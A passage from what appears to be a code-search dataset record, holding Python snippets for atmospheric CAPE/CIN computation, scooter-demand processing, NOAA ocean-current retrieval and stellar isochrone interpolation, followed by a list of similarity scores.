eqlev,stab=solve_eq(preswet[::-1],(tempwet-tempenv)[::-1])\n # NEW, for total column:\n # On second thought, we don't really want/need\n # any equilibrium levels below LCL\n # eqlev,stab=solve_eq(pparcel[::-1],(tparcel-tempenv)[::-1])\n # This is equivalent to the old statement :\n eqlev,stab=solve_eq(pparcel[pparcel<=P_lcl][::-1],\\\n (tparcel-tempenv)[pparcel<=P_lcl][::-1])\n\n aa = tparcel-tempenv\n\n # Sorting index by decreasing pressure\n I=np.argsort(eqlev)[::-1]\n eqlev=eqlev[I]; stab=stab[I]\n\n # temperatures at the equilibrium level\n # tempeq=interp(eqlev,preswet[::-1],tempenv[::-1])\n ## NEW, for total column:\n tempeq=interp(eqlev,pparcel[::-1],tparcel[::-1])\n\n # This helps with debugging\n # for ii,eq in enumerate(eqlev):\n # print \"%5.2f %5.2f %2d\"%(eq,tempeq[ii],stab[ii])\n\n # need environmental temperature at LCL\n tenv_lcl=interp(P_lcl,pparcel[::-1],tempenv[::-1])\n\n isstab=np.where(stab==1.,True,False)\n unstab=np.where(stab==1.,False,True) \n\n if eqlev.shape[0]==0:\n # no unstable layers in entire profile\n # because the parcel never crosses the tenv\n P_lfc=float('NaN')\n P_el=float('NaN')\n elif T_lcl>tenv_lcl:\n # check LCL to see if this is unstable\n P_lfc=P_lcl\n if totalcape:\n P_el=eqlev[isstab][-1]\n else:\n P_el=eqlev[isstab][0]\n elif eqlev.shape[0]>1:\n # Parcel is stable at LCL so LFC is the \n # first unstable equilibrium level and \n # \"EQ\" level is the first stable equilibrium \n # level\n P_lfc=eqlev[unstab][0]\n if 
totalcape:\n P_el=eqlev[isstab][-1]\n else:\n P_el=eqlev[isstab][0]\n else:\n # catch a problem... if there is only\n # one eqlev and it's stable (this is \n # unphysical), then it could be a vertical\n # resolution thing. This is a kind of \n # \"null\" option\n try:\n\t P_el=eqlev[isstab][0]\n P_lfc=eqlev[isstab][0]\n except:\n\t P_el=eqlev[unstab][0]\n P_lfc=eqlev[unstab][0]\t\n\t\n if np.isnan(P_lfc):\n return P_lcl,P_lfc,P_el,0,0\n\n # need to handle case where dwpt is not available \n # above a certain level for any reason. Most simplest \n # thing to do is set it to a reasonably low value; \n # this should be a conservative approach!\n \n #dwpt=dewpt.copy().soften_mask()\n [inds] = np.where(np.isnan(dewpt))\n dwpt = dewpt\n dwpt[inds] = dwpt.min()\n \n # raise ValueError\n #if dwpt[(pres>=P_el).data*(pres<P_lfc).data].mask.any():\n # print \"WARNING: substituting dwpt.min() for masked values of DWPT in this sounding\"\n #dwpt[dwpt.mask]=dwpt.min()\n # dwptenv=interp(preswet,pres[::-1],dwpt[::-1])\n # NEW:\n\n dwptenv=interp(pparcel,pres[::-1],dwpt[::-1])\n\n\n \n #if hght[(pres>=P_el).data].mask.any():\n # raise NotImplementedError, \"TODO: Implement standard atmosphere to substitute missing heights\"\n # hghtenv=interp(preswet,pres[::-1],self.soundingdata['hght'][::-1])\n # NEW:\n hghtenv=interp(pparcel,pres[::-1],hght[::-1])\n \n\n # Areas of POSITIVE Bouyancy\n # cond1=(tempwet>=tempenv)*(preswet<=P_lfc)*(preswet>P_el)\n # NEW:\n cond1=(tparcel>=tempenv)*(pparcel<=P_lfc)*(pparcel>P_el)\n # Areas of NEGATIVE Bouyancy\n # cond2=(tempwet<tempenv)*(preswet<=P_lcl)*(preswet>P_el)\n # NEW:\n if totalcape:\n cond2=(tparcel<tempenv)*(pparcel>P_el)\n else:\n cond2=(tparcel<tempenv)*(pparcel>P_lfc)\n # Do CAPE calculation\n # 1. Virtual temperature of parcel... 
remember it's saturated above LCL.\n # e_parcel=SatVap(tempwet)\n # Tv_parcel=VirtualTemp(tempwet+degCtoK,preswet*100.,e_parcel)\n # e_env=SatVap(dwptenv)\n # Tv_env=VirtualTemp(tempenv+degCtoK,preswet*100.,e_env)\n # NEW:\n e_parcel=SatVap(tparcel)\n Tv_parcel=VirtualTemp(tparcel+degCtoK,pparcel*100.,e_parcel)\n e_env=SatVap(dwptenv)\n Tv_env=VirtualTemp(tempenv+degCtoK,pparcel*100.,e_env)\n\n CAPE=trapz(9.81*(Tv_parcel[cond1]-Tv_env[cond1])/Tv_env[cond1],hghtenv[cond1])\n CIN=trapz(9.81*(Tv_parcel[cond2]-Tv_env[cond2])/Tv_env[cond2],hghtenv[cond2])\n\n return P_lcl,P_lfc,P_el,CAPE,CIN", "def process_data(self):\n timer_start = time.time()\n # ensure self.df_events and self.df_locations are not None\n if self.df_events is None or self.df_locations is None:\n print(\"Missing data: either df_events or df_locations is None\")\n return\n # set start and end based on self.df_events if not already set\n if not self.start:\n self.start = self.df_events['event_time'].min()\n if not self.end:\n self.end = self.df_events['event_time'].max()\n print(f\"date range for events data is from {self.start} to {self.end}\")\n # create Grid object before processing any data\n grid = self.compute_grid_cells(self.df_locations)\n # clean and combine events and locations data\n df_data = self.combine_events_and_locations(grid)\n print(df_data.shape)\n # df_data.to_csv('../../../data_files/20210506_cleanedInputDataCumSum.csv', index=False)\n # df_data = pd.read_csv('../../../data_files/20210415_cleanedInputDataAprilCumSum.csv')\n # process data within grid class\n df_processed = grid.process_data(df_data, 'weekly')\n # df_processed = self.calculate_demand(df_processed)\n # df_processed.to_csv('../../../data_files/20210506_processedGridCellData.csv')\n # set df_demand to be df_processed\n df_processed.reset_index(inplace=True)\n df_processed = df_processed.astype({'date': 'str', 'avail_count': 'float', 'avail_mins': 'float', 'prob_scooter_avail': 'float', 'trips': 'float', 'adj_trips': 'float'})\n # make sure dates are within start and end dates\n start_date = str(iso8601.parse_date(self.start).date())\n end_date = str(iso8601.parse_date(self.end).date())\n df_processed = df_processed[(df_processed['date'] >= start_date) & (df_processed['date'] <= end_date)]\n self.set_demand(df_processed)\n timer_end = time.time()\n print('Elapsed time to process data:', (timer_end - timer_start)/60.0, 'minutes')", "def coopsCurrentRequest(station_id, tides_dt_start, tides_dt_end):\n tides_data_options = \"time_zone=gmt&application=ports_screen&format=json\"\n tides_url = \"http://tidesandcurrents.noaa.gov/api/datagetter?\"\n begin_datetime = \"begin_date=\" + tides_dt_start\n end_datetime = \"&end_date=\" + tides_dt_end\n current_dp = \"&station=\" + station_id\n full_url = (tides_url + begin_datetime + end_datetime+current_dp +\n \"&application=web_services&product=currents&units=english&\" +\n tides_data_options)\n r = requests.get(full_url)\n try:\n r = r.json()\n except:\n return None\n if 'data' in r:\n r = r['data']\n data_dt = []\n data_spd = []\n data_dir = []\n for row in r:\n # Convert from knots to cm/s.\n data_spd.append(float(row['s']) * 51.4444444)\n data_dir.append(float(row['d']))\n date_time_val = datetime.strptime(row['t'], '%Y-%m-%d %H:%M')\n data_dt.append(date_time_val)\n\n data = dict()\n data['sea_water_speed (cm/s)'] = np.array(data_spd)\n data['direction_of_sea_water_velocity (degree)'] = np.array(data_dir)\n time = np.array(data_dt)\n columns = ['sea_water_speed (cm/s)',\n 
'direction_of_sea_water_velocity (degree)']\n df = DataFrame(data=data, index=time, columns=columns)\n return df\n else:\n return None", "def parsec_des_stellar_params(dmod=0):\n isos = load_parsec_isochrones(\"DECAM\")\n g_Teff_funcs = {}\n g_logg_funcs = {}\n r_Teff_funcs = {}\n r_logg_funcs = {}\n gmr_Teff_funcs = {}\n gmr_logg_funcs = {}\n interp_kwargs = {\"bounds_error\":False,\"fill_value\":np.nan}\n for key in isos.keys():\n tab = isos[key]\n tab = tab[(tab[\"label\"]==2) | (tab[\"label\"]==3)]\n gmag, rmag = tab[\"gmag\"], tab[\"rmag\"]\n logT, logg = tab[\"logTe\"], tab[\"logg\"]\n Teff = 10**logT\n g_Teff_funcs[key] = interpolate.interp1d(gmag+dmod,Teff,**interp_kwargs)\n g_logg_funcs[key] = interpolate.interp1d(gmag+dmod,logg,**interp_kwargs)\n r_Teff_funcs[key] = interpolate.interp1d(rmag+dmod,Teff,**interp_kwargs)\n r_logg_funcs[key] = interpolate.interp1d(rmag+dmod,logg,**interp_kwargs)\n gmr_Teff_funcs[key] = interpolate.interp1d(gmag-rmag,Teff,**interp_kwargs)\n gmr_logg_funcs[key] = interpolate.interp1d(gmag-rmag,logg,**interp_kwargs)\n return g_Teff_funcs, g_logg_funcs, r_Teff_funcs, r_logg_funcs, gmr_Teff_funcs, gmr_logg_funcs" ]
[ "0.6184481", "0.5654636", "0.55653894", "0.55446994", "0.5504313", "0.5501529", "0.5354049", "0.5346375", "0.5329468", "0.5328793", "0.52968925", "0.52822536", "0.5271903", "0.5270245", "0.5265283", "0.526407", "0.52583337", "0.5231366", "0.5223594", "0.5191087", "0.5191087", "0.51416296", "0.5132494", "0.51254237", "0.5115953", "0.5073504", "0.5045307", "0.50206375", "0.5007385", "0.49920517", "0.4989483", "0.4984466", "0.49808556", "0.49788547", "0.49673855", "0.49579373", "0.49525464", "0.4947624", "0.49380323", "0.49380216", "0.49318022", "0.49181497", "0.49039176", "0.4903631", "0.49027076", "0.485398", "0.48526257", "0.4838471", "0.4837028", "0.48251295", "0.48235452", "0.4815193", "0.48023137", "0.4800928", "0.4797778", "0.47960785", "0.47942755", "0.4793541", "0.47873223", "0.47871366", "0.4785366", "0.47823954", "0.47770986", "0.4773814", "0.47693366", "0.47689047", "0.4764486", "0.47593048", "0.4747037", "0.47387305", "0.47374725", "0.47313452", "0.47267297", "0.4719923", "0.47166952", "0.47141254", "0.47045177", "0.4704341", "0.46980366", "0.4695906", "0.46928895", "0.46915746", "0.46821105", "0.4679085", "0.46752954", "0.46626523", "0.46613073", "0.4653227", "0.46513113", "0.46497217", "0.46357295", "0.46330258", "0.46241087", "0.46236995", "0.46235985", "0.46069026", "0.4602032", "0.45985863", "0.45966378", "0.4596094" ]
0.5595784
2
Computing initial values for position and velocity in GCRS system
This is for later use in orbit integration, from tables in the prediction files. Use a lagrange polynomial in order to interpolate in the tables.
def calculate_initial_values(eph, rundate):
    data = sorted(eph["positions"].items())
    pos_itrs = np.zeros((len(data), 3))
    mjd1, mjd2 = zip(*[t for t, d in data])
    rotation_mat = rotation.trs2gcrs(time.Time(val=mjd1, val2=mjd2, fmt="mjd", scale="utc"))
    tbl = time.Time(val=mjd1, val2=mjd2, fmt="mjd", scale="utc")
    for i in range(0, len(data)):
        pos_itrs[i] = data[i][1]["pos"]
    diffsec = np.array([(t - rundate).total_seconds() for t in tbl.utc.datetime])
    # Table given in ITRF coordinate system. Convert to GCRS, where the integration of the satellite orbit will
    # be done
    pos_gcrs = np.sum(rotation_mat @ pos_itrs[:, :, None], axis=2)
    log.info("Interpolating data from prediction file in order to get initial pos/vel")
    pos_gcrs_ip, vel_gcrs_ip = interpolation.interpolate_with_derivative(
        diffsec, pos_gcrs, np.array([0.0]), kind="lagrange", window=10, bounds_error=False
    )
    eph["initial_pos"] = pos_gcrs_ip[0]
    eph["initial_vel"] = vel_gcrs_ip[0]
    return eph
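The heavy lifting above is delegated to interpolation.interpolate_with_derivative, whose implementation is not shown in this row. A minimal sketch of the same idea, assuming pos_gcrs is the (n, 3) GCRS array built above and using only numpy and scipy; the helper name initial_pos_vel and the window selection are illustrative assumptions, not the library's actual API:

import numpy as np
from scipy.interpolate import lagrange

def initial_pos_vel(diffsec, pos_gcrs, window=10):
    # Hypothetical stand-in for interpolation.interpolate_with_derivative.
    # Pick the `window` table epochs closest to the run date (t = 0 seconds),
    # mirroring the window=10 argument used above.
    idx = np.argsort(np.abs(diffsec))[:window]
    t = diffsec[idx]
    pos0, vel0 = np.empty(3), np.empty(3)
    for axis in range(3):
        poly = lagrange(t, pos_gcrs[idx, axis])  # numpy.poly1d through the points
        pos0[axis] = poly(0.0)            # interpolated position at the run date
        vel0[axis] = poly.deriv()(0.0)    # velocity from the analytic derivative
    return pos0, vel0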
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def initialize(self):\n self.positions = self._generate_initial_positions()\n self.scores = np.array(self.compute_scores(self.positions))\n\n self._pso_data.best_positions = self.positions\n self._pso_data.best_scores = self.scores\n\n magic_constant = 2 # feel free to change FIXME\n max_velocity = (self.upper_bound - self.lower_bound) / magic_constant\n shape = (len(self.positions), len(self.lower_bound))\n self._pso_data.velocities = np.random.uniform(low=-max_velocity, high=max_velocity, size=shape)", "def _initialize_spline(self, initial_state, final_state):\r\n x_f = final_state[0]\r\n y_f = final_state[1]\r\n theta_f = final_state[2] # rad\r\n kappa_f = final_state[3] # rad\r\n kappa_0 = initial_state[3] # rad\r\n\r\n \r\n d = np.sqrt(x_f**2 + y_f**2)\r\n theta_delta = np.abs(theta_f)\r\n s = d*(( (theta_delta**2) / 5) +1) + 2*theta_delta/5\r\n \r\n # Initialization method from Nagy and Kelly, 2001 \r\n # a = 6*theta_f/(s**2) - 2*kappa_0/s + 4*kappa_f/s\r\n # c = 0\r\n # b = 3*(kappa_0 + kappa_f)/(s**2) + 6*theta_f/(s**3)\r\n\r\n # Initilalization method from Thomas M. Howard, 2009\r\n a = 0.0\r\n b = 0.0\r\n c = kappa_f\r\n \r\n return a, b, c, s", "def initialize(self):\n\n for timestep in self.x:\n self.y_previous.append(self.equation(timestep))\n self.y_current.append(self.equation(timestep))\n\n self.y_previous[0] = 0\n self.y_current[0] = 0\n self.y_previous[99] = 0\n self.y_current[99] = 0", "def initialize():\n\n global z_from_t_interp\n\n # Logarithmic spacing\n log_z_set = np.linspace(0.0, 3.0, 300)\n z_set = 10**(log_z_set) - 1.0\n\n t_set = np.zeros(len(z_set))\n for i, z in enumerate(z_set):\n t_set[i] = calc_lookback_time(z) / 1.0e6 # in Myr\n\n z_from_t_interp = interp1d(t_set, z_set, bounds_error=False, fill_value=100.0)", "def initRunningVals(self):\n self.r_Vm = [0.0]*self.mirror.dataPoints\n self.r_Va = [0.0]*self.mirror.dataPoints", "def get_initial_params(self, x, y, yerr):\n estimated_max = max(y)\n estimated_min = min(y)\n y1 = map(int, y *1000)\n estimated_position = x[ y1.index(min(y1)) ]\n estimated_width = (max(x) - min(x)) / 20.0\n p0 = array([estimated_position, estimated_width, estimated_max, estimated_min])\n return p0", "def initialize(H, Hmin, HZ, HminZ, solutes, restart_folder,\n field_to_subspace, XYZ,\n inlet_velocity,\n enable_NS, enable_PF, enable_EC,\n **namespace):\n w_init_field = dict()\n # if not restart_folder:\n # if enable_NS:\n # try:\n # subspace = field_to_subspace[\"u\"].collapse()\n # except:\n # subspace = field_to_subspace[\"u\"]\n # u_init = velocity_init(H, HZ, inlet_velocity, XYZ, 1, Hmin, HminZ)\n # w_init_field[\"u\"] = df.interpolate(u_init, subspace)\n\n # Ensure all processes have completed (Might be redundant)\n mpi_barrier()\n return w_init_field", "def __init__(self, timestep=1.0 * simtk.unit.femtoseconds):\n\n super(VelocityVerletIntegrator, self).__init__(timestep)\n\n self.addPerDofVariable(\"x1\", 0)\n\n self.addUpdateContextState()\n self.addComputePerDof(\"v\", \"v+0.5*dt*f/m\")\n self.addComputePerDof(\"x\", \"x+dt*v\")\n self.addComputePerDof(\"x1\", \"x\")\n self.addConstrainPositions()\n self.addComputePerDof(\"v\", \"v+0.5*dt*f/m+(x-x1)/dt\")\n self.addConstrainVelocities()", "def main():\n \n def get_x_input():\n \"\"\"\n This gets the initial x position and velocity values\n Param:none\n Return:Tuple with x pos and vel\n \"\"\"\n # Ask for and validate user input for x pos and vel\n while True:\n try:\n posx = float(input(\"Please enter the initial x position in m: \"))\n except ValueError:\n 
print(\"Invalid Input\")\n continue\n else:\n break\n\n while True:\n try:\n velx = float(input(\"Please enter the initial x velocity in m/s: \"))\n except ValueError:\n print(\"Invalid Input\")\n continue\n else:\n break\n \n #return tuple\n xinput = (posx, velx)\n return xinput\n\n def get_y_input():\n \"\"\"\n This gets the initial y position and velocity values\n Param:none\n Return:Tuple with y pos and vel\n \"\"\" \n # Ask for and validate user input for y pos and vel\n while True:\n try:\n posy = float(input(\"Please enter the initial y position in m: \"))\n\n #start at ground\n if posy < 0:\n print(\"Please enter a positive value.\")\n continue\n\n except ValueError:\n print(\"Invalid input\")\n continue\n else:\n break\n\n while True:\n try:\n vely = float(input(\"Please enter the initial y velocity in m/s: \"))\n except ValueError:\n print(\"Invalid Input\")\n continue\n else:\n break\n \n # Return tuple\n yinput = (posy, vely)\n return yinput\n\n #Inital position and velocity of user input x and y\n posx0, velx0 = get_x_input()\n posy0, vely0 = get_y_input()\n \n #acceleration y acceleration is gravity\n accelx = 0.0\n GRAVITY = -9.8 \n \n #Initial time of 0s, time intervals of .01 s\n deltat = .01\n t = 0.0\n \n #lists of all x and y positions in the motion \n x = [posx0]\n y = [posy0]\n \n #limit of time intervals to calculate\n intervals = 4000\n\n for i in range(0, intervals):\n #increment time, add xy positions at that time\n t = t + deltat\n x.append(position(posx0, velx0, t, accelx))\n y.append(position(posy0, vely0, t, GRAVITY))\n \n #if the projectile has hit the ground, break\n if y[i+1] <= 0:\n break\n\n plot_motion(x, y)", "def initialize_local_frame(self):\n self.local_offset_g = 0.0\n\n for i in range(30):\n rospy.sleep(0.1)\n\n q0, q1, q2, q3 = (\n self.current_pose_g.pose.pose.orientation.w,\n self.current_pose_g.pose.pose.orientation.x,\n self.current_pose_g.pose.pose.orientation.y,\n self.current_pose_g.pose.pose.orientation.z,\n )\n\n psi = atan2((2 * (q0 * q3 + q1 * q2)),\n (1 - 2 * (pow(q2, 2) + pow(q3, 2))))\n\n self.local_offset_g += degrees(psi)\n self.local_offset_pose_g.x += self.current_pose_g.pose.pose.position.x\n self.local_offset_pose_g.y += self.current_pose_g.pose.pose.position.y\n self.local_offset_pose_g.z += self.current_pose_g.pose.pose.position.z\n\n self.local_offset_pose_g.x /= 30.0\n self.local_offset_pose_g.y /= 30.0\n self.local_offset_pose_g.z /= 30.0\n self.local_offset_g /= 30.0\n\n rospy.loginfo(CBLUE2 + \"Coordinate offset set\" + CEND)\n rospy.loginfo(\n CGREEN2 + \"The X-Axis is facing: {}\".format(self.local_offset_g) + CEND)", "def initialise_calibration(self):\n for i in range(0, self.NUM_SENSORS):\n self.calibratedMax[i] = 0\n self.calibratedMin[i] = self.READING_TIMEOUT", "def recalibrate_start(self):\n self.epoch += 1\n self.initialize()\n self.recalibration_i = 0\n\n if self.vr_from_epoch is not None and self.epoch >= self.vr_from_epoch:\n for group in self.param_groups:\n for p in group['params']:\n param_state = self.state[p]\n param_state['gavg'].zero_()\n param_state['m2'].zero_()\n\n # xk is changed to the running_x\n p.data.zero_().add_(param_state['running_x'])\n param_state['tilde_x'] = p.data.clone()", "def evolve(self):\n\n rho = self.cc_data.get_var(\"density\")\n u = self.cc_data.get_var(\"x-velocity\")\n v = self.cc_data.get_var(\"y-velocity\")\n\n gradp_x = self.cc_data.get_var(\"gradp_x\")\n gradp_y = self.cc_data.get_var(\"gradp_y\")\n\n # note: the base state quantities do not have valid ghost cells\n 
beta0 = self.base[\"beta0\"]\n beta0_edges = self.base[\"beta0-edges\"]\n\n rho0 = self.base[\"rho0\"]\n\n phi = self.cc_data.get_var(\"phi\")\n\n myg = self.cc_data.grid\n\n # ---------------------------------------------------------------------\n # create the limited slopes of rho, u and v (in both directions)\n # ---------------------------------------------------------------------\n limiter = self.rp.get_param(\"lm-atmosphere.limiter\")\n\n ldelta_rx = reconstruction.limit(rho, myg, 1, limiter)\n ldelta_ux = reconstruction.limit(u, myg, 1, limiter)\n ldelta_vx = reconstruction.limit(v, myg, 1, limiter)\n\n ldelta_ry = reconstruction.limit(rho, myg, 2, limiter)\n ldelta_uy = reconstruction.limit(u, myg, 2, limiter)\n ldelta_vy = reconstruction.limit(v, myg, 2, limiter)\n\n # ---------------------------------------------------------------------\n # get the advective velocities\n # ---------------------------------------------------------------------\n\n \"\"\"\n the advective velocities are the normal velocity through each cell\n interface, and are defined on the cell edges, in a MAC type\n staggered form\n\n n+1/2\n v\n i,j+1/2\n +------+------+\n | |\n n+1/2 | | n+1/2\n u + U + u\n i-1/2,j | i,j | i+1/2,j\n | |\n +------+------+\n n+1/2\n v\n i,j-1/2\n\n \"\"\"\n\n # this returns u on x-interfaces and v on y-interfaces. These\n # constitute the MAC grid\n if self.verbose > 0:\n print(\" making MAC velocities\")\n\n # create the coefficient to the grad (pi/beta) term\n coeff = self.aux_data.get_var(\"coeff\")\n coeff.v()[:, :] = 1.0/rho.v()\n coeff.v()[:, :] = coeff.v()*beta0.v2d()\n self.aux_data.fill_BC(\"coeff\")\n\n # create the source term\n source = self.aux_data.get_var(\"source_y\")\n\n g = self.rp.get_param(\"lm-atmosphere.grav\")\n rhoprime = self.make_prime(rho, rho0)\n source.v()[:, :] = rhoprime.v()*g/rho.v()\n self.aux_data.fill_BC(\"source_y\")\n\n _um, _vm = lm_interface.mac_vels(myg.ng, myg.dx, myg.dy, self.dt,\n u, v,\n ldelta_ux, ldelta_vx,\n ldelta_uy, ldelta_vy,\n coeff*gradp_x, coeff*gradp_y,\n source)\n\n u_MAC = ai.ArrayIndexer(d=_um, grid=myg)\n v_MAC = ai.ArrayIndexer(d=_vm, grid=myg)\n\n # ---------------------------------------------------------------------\n # do a MAC projection to make the advective velocities divergence\n # free\n # ---------------------------------------------------------------------\n\n # we will solve D (beta_0^2/rho) G phi = D (beta_0 U^MAC), where\n # phi is cell centered, and U^MAC is the MAC-type staggered\n # grid of the advective velocities.\n\n if self.verbose > 0:\n print(\" MAC projection\")\n\n # create the coefficient array: beta0**2/rho\n # MZ!!!! probably don't need the buf here\n coeff.v(buf=1)[:, :] = 1.0/rho.v(buf=1)\n coeff.v(buf=1)[:, :] = coeff.v(buf=1)*beta0.v2d(buf=1)**2\n\n # create the multigrid object\n mg = vcMG.VarCoeffCCMG2d(myg.nx, myg.ny,\n xl_BC_type=self.cc_data.BCs[\"phi-MAC\"].xlb,\n xr_BC_type=self.cc_data.BCs[\"phi-MAC\"].xrb,\n yl_BC_type=self.cc_data.BCs[\"phi-MAC\"].ylb,\n yr_BC_type=self.cc_data.BCs[\"phi-MAC\"].yrb,\n xmin=myg.xmin, xmax=myg.xmax,\n ymin=myg.ymin, ymax=myg.ymax,\n coeffs=coeff,\n coeffs_bc=self.cc_data.BCs[\"density\"],\n verbose=0)\n\n # first compute div{beta_0 U}\n div_beta_U = mg.soln_grid.scratch_array()\n\n # MAC velocities are edge-centered. 
div{beta_0 U} is cell-centered.\n div_beta_U.v()[:, :] = \\\n beta0.v2d()*(u_MAC.ip(1) - u_MAC.v())/myg.dx + \\\n (beta0_edges.v2dp(1)*v_MAC.jp(1) -\n beta0_edges.v2d()*v_MAC.v())/myg.dy\n\n # solve the Poisson problem\n mg.init_RHS(div_beta_U)\n mg.solve(rtol=1.e-12)\n\n # update the normal velocities with the pressure gradient -- these\n # constitute our advective velocities. Note that what we actually\n # solved for here is phi/beta_0\n phi_MAC = self.cc_data.get_var(\"phi-MAC\")\n phi_MAC[:, :] = mg.get_solution(grid=myg)\n\n coeff = self.aux_data.get_var(\"coeff\")\n coeff.v()[:, :] = 1.0/rho.v()\n coeff.v()[:, :] = coeff.v()*beta0.v2d()\n self.aux_data.fill_BC(\"coeff\")\n\n coeff_x = myg.scratch_array()\n b = (3, 1, 0, 0) # this seems more than we need\n coeff_x.v(buf=b)[:, :] = 0.5*(coeff.ip(-1, buf=b) + coeff.v(buf=b))\n\n coeff_y = myg.scratch_array()\n b = (0, 0, 3, 1)\n coeff_y.v(buf=b)[:, :] = 0.5*(coeff.jp(-1, buf=b) + coeff.v(buf=b))\n\n # we need the MAC velocities on all edges of the computational domain\n # here we do U = U - (beta_0/rho) grad (phi/beta_0)\n b = (0, 1, 0, 0)\n u_MAC.v(buf=b)[:, :] -= \\\n coeff_x.v(buf=b)*(phi_MAC.v(buf=b) - phi_MAC.ip(-1, buf=b))/myg.dx\n\n b = (0, 0, 0, 1)\n v_MAC.v(buf=b)[:, :] -= \\\n coeff_y.v(buf=b)*(phi_MAC.v(buf=b) - phi_MAC.jp(-1, buf=b))/myg.dy\n\n # ---------------------------------------------------------------------\n # predict rho to the edges and do its conservative update\n # ---------------------------------------------------------------------\n _rx, _ry = lm_interface.rho_states(myg.ng, myg.dx, myg.dy, self.dt,\n rho, u_MAC, v_MAC,\n ldelta_rx, ldelta_ry)\n\n rho_xint = ai.ArrayIndexer(d=_rx, grid=myg)\n rho_yint = ai.ArrayIndexer(d=_ry, grid=myg)\n\n rho_old = rho.copy()\n\n rho.v()[:, :] -= self.dt*(\n # (rho u)_x\n (rho_xint.ip(1)*u_MAC.ip(1) - rho_xint.v()*u_MAC.v())/myg.dx +\n # (rho v)_y\n (rho_yint.jp(1)*v_MAC.jp(1) - rho_yint.v()*v_MAC.v())/myg.dy)\n\n self.cc_data.fill_BC(\"density\")\n\n # update eint as a diagnostic\n eint = self.cc_data.get_var(\"eint\")\n gamma = self.rp.get_param(\"eos.gamma\")\n eint.v()[:, :] = self.base[\"p0\"].v2d()/(gamma - 1.0)/rho.v()\n\n # ---------------------------------------------------------------------\n # recompute the interface states, using the advective velocity\n # from above\n # ---------------------------------------------------------------------\n if self.verbose > 0:\n print(\" making u, v edge states\")\n\n coeff = self.aux_data.get_var(\"coeff\")\n coeff.v()[:, :] = 2.0/(rho.v() + rho_old.v())\n coeff.v()[:, :] = coeff.v()*beta0.v2d()\n self.aux_data.fill_BC(\"coeff\")\n\n _ux, _vx, _uy, _vy = \\\n lm_interface.states(myg.ng, myg.dx, myg.dy, self.dt,\n u, v,\n ldelta_ux, ldelta_vx,\n ldelta_uy, ldelta_vy,\n coeff*gradp_x, coeff*gradp_y,\n source,\n u_MAC, v_MAC)\n\n u_xint = ai.ArrayIndexer(d=_ux, grid=myg)\n v_xint = ai.ArrayIndexer(d=_vx, grid=myg)\n u_yint = ai.ArrayIndexer(d=_uy, grid=myg)\n v_yint = ai.ArrayIndexer(d=_vy, grid=myg)\n\n # ---------------------------------------------------------------------\n # update U to get the provisional velocity field\n # ---------------------------------------------------------------------\n if self.verbose > 0:\n print(\" doing provisional update of u, v\")\n\n # compute (U.grad)U\n\n # we want u_MAC U_x + v_MAC U_y\n advect_x = myg.scratch_array()\n advect_y = myg.scratch_array()\n\n advect_x.v()[:, :] = \\\n 0.5*(u_MAC.v() + u_MAC.ip(1))*(u_xint.ip(1) - u_xint.v())/myg.dx +\\\n 0.5*(v_MAC.v() + 
v_MAC.jp(1))*(u_yint.jp(1) - u_yint.v())/myg.dy\n\n advect_y.v()[:, :] = \\\n 0.5*(u_MAC.v() + u_MAC.ip(1))*(v_xint.ip(1) - v_xint.v())/myg.dx +\\\n 0.5*(v_MAC.v() + v_MAC.jp(1))*(v_yint.jp(1) - v_yint.v())/myg.dy\n\n proj_type = self.rp.get_param(\"lm-atmosphere.proj_type\")\n\n if proj_type == 1:\n u.v()[:, :] -= (self.dt*advect_x.v() + self.dt*gradp_x.v())\n v.v()[:, :] -= (self.dt*advect_y.v() + self.dt*gradp_y.v())\n\n elif proj_type == 2:\n u.v()[:, :] -= self.dt*advect_x.v()\n v.v()[:, :] -= self.dt*advect_y.v()\n\n # add the gravitational source\n rho_half = 0.5*(rho + rho_old)\n rhoprime = self.make_prime(rho_half, rho0)\n source[:, :] = rhoprime*g/rho_half\n self.aux_data.fill_BC(\"source_y\")\n\n v[:, :] += self.dt*source\n\n self.cc_data.fill_BC(\"x-velocity\")\n self.cc_data.fill_BC(\"y-velocity\")\n\n if self.verbose > 0:\n print(\"min/max rho = {}, {}\".format(self.cc_data.min(\"density\"), self.cc_data.max(\"density\")))\n print(\"min/max u = {}, {}\".format(self.cc_data.min(\"x-velocity\"), self.cc_data.max(\"x-velocity\")))\n print(\"min/max v = {}, {}\".format(self.cc_data.min(\"y-velocity\"), self.cc_data.max(\"y-velocity\")))\n\n # ---------------------------------------------------------------------\n # project the final velocity\n # ---------------------------------------------------------------------\n\n # now we solve L phi = D (U* /dt)\n if self.verbose > 0:\n print(\" final projection\")\n\n # create the coefficient array: beta0**2/rho\n coeff = 1.0/rho\n coeff.v()[:, :] = coeff.v()*beta0.v2d()**2\n\n # create the multigrid object\n mg = vcMG.VarCoeffCCMG2d(myg.nx, myg.ny,\n xl_BC_type=self.cc_data.BCs[\"phi\"].xlb,\n xr_BC_type=self.cc_data.BCs[\"phi\"].xrb,\n yl_BC_type=self.cc_data.BCs[\"phi\"].ylb,\n yr_BC_type=self.cc_data.BCs[\"phi\"].yrb,\n xmin=myg.xmin, xmax=myg.xmax,\n ymin=myg.ymin, ymax=myg.ymax,\n coeffs=coeff,\n coeffs_bc=self.cc_data.BCs[\"density\"],\n verbose=0)\n\n # first compute div{beta_0 U}\n\n # u/v are cell-centered, divU is cell-centered\n div_beta_U.v()[:, :] = \\\n 0.5*beta0.v2d()*(u.ip(1) - u.ip(-1))/myg.dx + \\\n 0.5*(beta0.v2dp(1)*v.jp(1) - beta0.v2dp(-1)*v.jp(-1))/myg.dy\n\n mg.init_RHS(div_beta_U/self.dt)\n\n # use the old phi as our initial guess\n phiGuess = mg.soln_grid.scratch_array()\n phiGuess.v(buf=1)[:, :] = phi.v(buf=1)\n mg.init_solution(phiGuess)\n\n # solve\n mg.solve(rtol=1.e-12)\n\n # store the solution in our self.cc_data object -- include a single\n # ghostcell\n phi[:, :] = mg.get_solution(grid=myg)\n\n # get the cell-centered gradient of p and update the velocities\n # this differs depending on what we projected.\n gradphi_x, gradphi_y = mg.get_solution_gradient(grid=myg)\n\n # U = U - (beta_0/rho) grad (phi/beta_0)\n coeff = 1.0/rho\n coeff.v()[:, :] = coeff.v()*beta0.v2d()\n\n u.v()[:, :] -= self.dt*coeff.v()*gradphi_x.v()\n v.v()[:, :] -= self.dt*coeff.v()*gradphi_y.v()\n\n # store gradp for the next step\n\n if proj_type == 1:\n gradp_x.v()[:, :] += gradphi_x.v()\n gradp_y.v()[:, :] += gradphi_y.v()\n\n elif proj_type == 2:\n gradp_x.v()[:, :] 